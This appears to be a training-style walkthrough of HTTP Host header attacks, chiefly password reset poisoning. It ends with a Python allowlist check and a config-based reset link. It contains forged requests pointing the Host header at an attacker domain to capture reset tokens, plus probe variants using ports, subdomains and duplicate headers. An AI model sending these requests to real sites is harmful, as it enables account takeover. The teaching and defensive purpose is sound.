HTTP
The HTTP Host header is a mandatory request header as of HTTP/1.1.
# GET /home HTTP/1.1
# Host: web-security-academy.net
# User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64;
<a href="https://_SERVER['HOST']/support">Contact support</a>
# Password reset email
Sent: 2022-05-01 15:03:47 +0000
From: "No reply" <web-security-academy.net>
To: "wiener" <wiener@web-security-academy.net>
Subject: Account recovery
Hello!
Please follow the link below to reset your password.
https://web-security-academy.net/forgot-password?token=cjA5K7uMV7EJoZW05fJjgApuphV6pNKQ
Intercept
An attacker can intercept the resulting HTTP request and modify the Host header.
# Burp Intercept
GET /email HTTP/1.1
Host: hacker-exploit.net # Look Here
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64;
# If the victim clicks this link ...
# or it is fetched by an antivirus scanner ...
# the password reset token will be delivered to the attacker's server.
Identify
Check whether you can modify the Host header and still reach the target application with your request.
# Modify host
GET /example HTTP/1.1
Host: exploit-website.com # Look Here
# Modify port
GET /example HTTP/1.1
Host: vulnerable-website.com:9999
# Modify subdomain
GET /example HTTP/1.1
Host: hacked.vulnerable-website.com
# Duplicate host
GET /example HTTP/1.1
Host: vulnerable-website.com
Host: exploit-website.com
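A server-side check that rejects the four Host variations listed above, together with a reset link built from configuration instead of the request's Host header. This is an added example, not code from the original page; the allowlist, the canonical origin and the function names are assumptions.

```python
from urllib.parse import urlencode

# Assumption: the canonical origin and the accepted Host values come from
# server-side configuration, never from the incoming request.
CANONICAL_ORIGIN = "https://vulnerable-website.com"
ALLOWED_HOSTS = {"vulnerable-website.com", "vulnerable-website.com:443"}

def host_headers(raw_request: str) -> list[str]:
    """Return every Host header value found in a raw HTTP/1.1 request head."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    values = []
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "host":
            values.append(value.strip().lower())
    return values

def check_host(raw_request: str) -> tuple[bool, str]:
    """Accept only requests with exactly one Host header on the allowlist."""
    hosts = host_headers(raw_request)
    if not hosts:
        return False, "missing Host header"
    if len(hosts) > 1:
        return False, "duplicate Host header"
    if hosts[0] not in ALLOWED_HOSTS:
        return False, "Host not on allowlist"
    return True, "ok"

def reset_link(token: str) -> str:
    """Build the reset URL from configuration, ignoring the request's Host."""
    return f"{CANONICAL_ORIGIN}/forgot-password?{urlencode({'token': token})}"

# Constructed requests mirroring the four variations listed above.
PROBES = {
    "legit": "GET /example HTTP/1.1\r\nHost: vulnerable-website.com\r\n\r\n",
    "host": "GET /example HTTP/1.1\r\nHost: exploit-website.com\r\n\r\n",
    "port": "GET /example HTTP/1.1\r\nHost: vulnerable-website.com:9999\r\n\r\n",
    "subdomain": "GET /example HTTP/1.1\r\nHost: hacked.vulnerable-website.com\r\n\r\n",
    "duplicate": "GET /example HTTP/1.1\r\nHost: vulnerable-website.com\r\n"
                 "Host: exploit-website.com\r\n\r\n",
}

if __name__ == "__main__":
    for name, request in PROBES.items():
        print(f"{name:10} -> {check_host(request)}")
    print(reset_link("example-token"))
```

The allowlist is matched on the full host:port string, so an unexpected port or subdomain fails the same way as a foreign domain.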